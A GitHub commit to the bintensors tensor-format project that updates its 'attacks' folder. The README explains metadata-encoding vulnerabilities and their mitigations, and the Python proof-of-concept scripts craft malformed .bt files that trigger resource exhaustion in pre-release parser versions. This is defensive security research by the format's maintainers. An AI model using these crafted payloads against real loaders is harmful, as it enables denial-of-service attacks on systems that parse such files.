Skip to content

Commit f7991fb

Browse files
committed
chore(docs): update attacks from prerelease to release layout #1
1 parent 0941719 commit f7991fb

File tree

4 files changed

+164
-32
lines changed

4 files changed

+164
-32
lines changed

attacks/README.md

Lines changed: 14 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -27,8 +27,21 @@ One of my favourite proposed attacks against `SafeTensors` and this format invol
2727

2828
### Attempt 4
2929

30+
> ⚠️ **Note:** The exploit is no longer applicable in the release version (Rust: `0.1.0`, Python: `0.1.0`) due to significant changes in the file layout compared to the pre-release versions (`0.0.1-alpha.3` / `0.0.5`).
31+
3032
This format vulnerability was unexpected and prompted a thorough review, resulting in [commit](https://github.com/GnosisFoundation/bintensors/commit/032826e369d301b49eb264090581e24198d3a4ed) to properly validate the issue. The root cause lies in tensor_info entries exceeding their index_map counterparts, leading to potential memory allocation mismatches. To mitigate this risk, we introduced a validation check: if the size of tensor_info exceeds that of index_map, the format is immediately deemed invalid.
3133

3234
This issue is specific to BinTensors and can only arise if the file has been manually altered.
3335

34-
An alternative approach would be to project the data into a format that preserves order, similar to how SafeTensors uses Metadata to construct HashMetadata before serialization. However, in our testing, this method resulted in a ~40% degradation in deserialization performance while providing only a ~1% improvement in serialization efficiency. Given these trade-offs, we opted for the validation-based approach.
36+
### Attempt 5
37+
38+
> ⚠️ **Note:** The exploit is no longer applicable in the release version (Rust: `0.1.0`, Python: `0.1.0`) due to significant changes in the file layout compared to the pre-release versions (`0.0.1-alpha.3` / `0.0.5`).
39+
40+
41+
I had a moment of clarity that led to identifying a critical flaw in the metadata encoding of the format. Specifically, I realized that an attacker could craft an oversized `index_map` to maliciously reference the **same tensor buffer repeatedly**, resulting in the deserialization of **tens or even hundreds of megabytes** from a single tensor entry — all without increasing the actual tensor data footprint.
42+
43+
This vulnerability exposes the system to resource exhaustion attacks and bypasses intended memory boundaries.
44+
45+
### Proposed Mitigation
46+
47+
To resolve this issue, the internal `Metadata` structure was redesigned into a more organized and deterministic format, minimizing the risk of errors. Details of the new format can be found in the [specification](https://github.com/GnosisFoundation/bintensors/blob/master/specs/encoding.md#-header-reconstruction).

attacks/av_attempt_3.py

Lines changed: 19 additions & 28 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@
2222
"F64": 14,
2323
}
2424

25-
from typing import Tuple, List
25+
from typing import Tuple
2626

2727

2828
def encode_unsigned_variant_encoding(number: int) -> bytes:
@@ -37,31 +37,23 @@ def encode_unsigned_variant_encoding(number: int) -> bytes:
3737
return number.to_bytes(1, "little")
3838

3939

40-
def encode_tensor_info(dtype: str, shape: Tuple[int, ...], offset: Tuple[int, int]) -> List[bytes]:
41-
"""Encodes the struct TensorInfo into byte buffer"""
40+
def encode_header(id: str, dtype: str, shape: Tuple[int, ...], offset: Tuple[int, int]) -> bytes:
41+
"""Encodes the struct TensorInfo into byte buffer with string ID prefix."""
4242
if dtype not in _DTYPE:
4343
raise ValueError(f"Unsupported dtype: {dtype}")
4444

45-
# flatten out the tensor info
46-
layout = chain([_DTYPE[dtype], len(shape)], shape, offset)
47-
return b"".join(list(map(encode_unsigned_variant_encoding, layout)))
45+
encoded_id = encode_unsigned_variant_encoding(len(id)) + id.encode("utf-8")
4846

49-
50-
def encode_hash_map(index_map: Dict[str, int]) -> List[bytes]:
51-
"""Encodes a dictionary of string keys and integer values."""
52-
length = encode_unsigned_variant_encoding(len(index_map))
53-
54-
hash_map_layout = chain.from_iterable(
55-
(
56-
encode_unsigned_variant_encoding(len(k)),
57-
k.encode("utf-8"),
58-
encode_unsigned_variant_encoding(v),
59-
)
60-
for k, v in index_map.items()
47+
# Compose numeric fields
48+
numeric_layout = chain(
49+
[_DTYPE[dtype], len(shape)],
50+
shape,
51+
offset
6152
)
6253

63-
return b"".join(chain([length], hash_map_layout))
54+
encoded_tensor_info = b"".join(encode_unsigned_variant_encoding(x) for x in numeric_layout)
6455

56+
return encoded_id + encoded_tensor_info
6557

6658
filename = "bintensors_abuse_attempt_3.bt"
6759

@@ -74,14 +66,10 @@ def create_payload(size: int):
7466
length = encode_unsigned_variant_encoding(size)
7567

7668
# Create tensor info buffer
77-
tensor_info_buffer = b"".join(encode_tensor_info("F32", shape, (0, tensor_chunk_length)) for _ in range(size))
78-
layout_tensor_info = length + tensor_info_buffer
79-
80-
# Create hash map layout
81-
hash_map_layout = encode_hash_map({f"weight_{i}": i for i in range(size)})
69+
header = b"".join(encode_header(f"weight_{i}", "F32", shape, (0, tensor_chunk_length)) for i in range(size))
8270

8371
# Construct full layout
84-
layout = b"\0" + layout_tensor_info + hash_map_layout
72+
layout = b"\x00" + length + header
8573
layout += b" " * (((8 - len(layout)) % 8) % 8)
8674
n = len(layout)
8775
n_header = n.to_bytes(8, "little")
@@ -92,10 +80,13 @@ def create_payload(size: int):
9280
f.write(layout)
9381
f.write(b"\0" * tensor_chunk_length)
9482

95-
print(f"Payload written to {filename}")
83+
84+
print(f"[✓] Payload written: {filename}")
9685

9786

9887
if __name__ == "__main__":
99-
create_payload(5)
100-
print(f"The file {filename} is {os.path.getsize(filename) / 10_000_00} Mb")
88+
create_payload(100)
89+
print(f"[✓] Size: {os.path.getsize(filename) / 1_000_000:.5f} MB")
10190
load_file(filename)
91+
92+

attacks/av_attempt_4.py

Lines changed: 8 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -4,6 +4,7 @@
44
from typing import List, Dict
55
from itertools import chain
66

7+
78
_DTYPE = {
89
"BOL": 0,
910
"U8": 1,
@@ -103,6 +104,10 @@ def create_payload(size: int):
103104

104105

105106
if __name__ == "__main__":
106-
create_payload(2)
107-
print(f"The file {filename} is {os.path.getsize(filename) / 10_000_00} Mb")
108-
print(load_file(filename))
107+
import warnings
108+
import bintensors
109+
if bintensors.__version__ <= "0.0.5":
110+
warnings.warn("This attack will be depricated within the release version of bintensors, and only applies 0.0.5 and below.")
111+
create_payload(2)
112+
print(f"The file {filename} is {os.path.getsize(filename) / 10_000_00} Mb")
113+
print(load_file(filename))

attacks/av_attempt_5.py

Lines changed: 123 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,123 @@
1+
# Safetensors attack proposal #4
2+
import os
3+
import torch
4+
from bintensors.torch import load_file, load, save
5+
from typing import List, Dict
6+
from itertools import chain
7+
8+
9+
_DTYPE = {
10+
"BOL": 0,
11+
"U8": 1,
12+
"I8": 2,
13+
"F8_E5M2": 3,
14+
"F8_E4M3": 4,
15+
"I16": 5,
16+
"U16": 6,
17+
"F16": 7,
18+
"BF16": 8,
19+
"I32": 9,
20+
"U32": 10,
21+
"F32": 11,
22+
"F64": 12,
23+
"I64": 13,
24+
"F64": 14,
25+
}
26+
27+
from typing import Tuple, List
28+
29+
30+
def encode_unsigned_variant_encoding(number: int) -> bytes:
31+
"""Encodes an unsigned integer into a variable-length format."""
32+
if number > 0xFFFFFFFF:
33+
return b"\xfd" + number.to_bytes(8, "little")
34+
elif number > 0xFFFF:
35+
return b"\xfc" + number.to_bytes(4, "little")
36+
elif number > 0xFA:
37+
return b"\xfb" + number.to_bytes(2, "little")
38+
else:
39+
return number.to_bytes(1, "little")
40+
41+
42+
def encode_tensor_info(dtype: str, shape: Tuple[int, ...], offset: Tuple[int, int]) -> List[bytes]:
43+
"""Encodes the struct TensorInfo into byte buffer"""
44+
if dtype not in _DTYPE:
45+
raise ValueError(f"Unsupported dtype: {dtype}")
46+
47+
# flatten out the tensor info
48+
layout = chain([_DTYPE[dtype], len(shape)], shape, offset)
49+
return b"".join(list(map(encode_unsigned_variant_encoding, layout)))
50+
51+
52+
def custom_encode_hash_map(index_map: Dict[str, int]) -> List[bytes]:
53+
"""Encodes a dictionary of string keys and integer values."""
54+
length = encode_unsigned_variant_encoding(len(index_map))
55+
56+
hash_map_layout = chain.from_iterable(
57+
(
58+
encode_unsigned_variant_encoding(len(k)),
59+
k.encode("utf-8"),
60+
encode_unsigned_variant_encoding(0), # payload
61+
)
62+
for k, v in index_map.items()
63+
)
64+
65+
return b"".join(chain([length], hash_map_layout))
66+
67+
filename = "bintensors_abuse_attempt_5.bt"
68+
69+
70+
def create_payload(size: int):
71+
"""Generates a binary payload with tensor metadata and hash map layout."""
72+
shape = [(1, 1), (2, 2)]
73+
74+
length = encode_unsigned_variant_encoding(size)
75+
76+
# Create tensor info buffer
77+
tensor_info_buffer = b"".join(
78+
[encode_tensor_info(
79+
"F32",
80+
(1, 1),
81+
(0, 4),
82+
),
83+
encode_tensor_info(
84+
"F32",
85+
(2, 2),
86+
(4, 20),
87+
)]
88+
)
89+
90+
layout_tensor_info = length + tensor_info_buffer
91+
92+
# Create index_map { "weight_0" : 0, "weight_1" : 0 } same index
93+
hash_map_layout = custom_encode_hash_map({f"weight_{i}": i for i in range(size)})
94+
95+
# Construct full layout
96+
layout = b"\0" + layout_tensor_info + hash_map_layout
97+
layout += b" " * (((8 - len(layout)) % 8) % 8)
98+
n = len(layout)
99+
n_header = n.to_bytes(8, "little")
100+
101+
# Write payload to file
102+
with open(filename, "wb") as f:
103+
f.write(n_header)
104+
f.write(layout)
105+
f.write(b"\0" * 20)
106+
107+
print(f"Payload written to {filename}")
108+
return n_header + layout + (b"\0" * 20)
109+
110+
111+
if __name__ == "__main__":
112+
import warnings
113+
import bintensors
114+
115+
116+
if bintensors.__version__ <= "0.0.5":
117+
warnings.warn("This attack will be depricated within the release version of bintensors, and only applies 0.0.5 and below.")
118+
create_payload(2)
119+
print(f"The file {filename} is {os.path.getsize(filename) / 10_000_00} Mb")
120+
buffer = load_file(filename)
121+
print(buffer)
122+
123+

0 commit comments

Comments
 (0)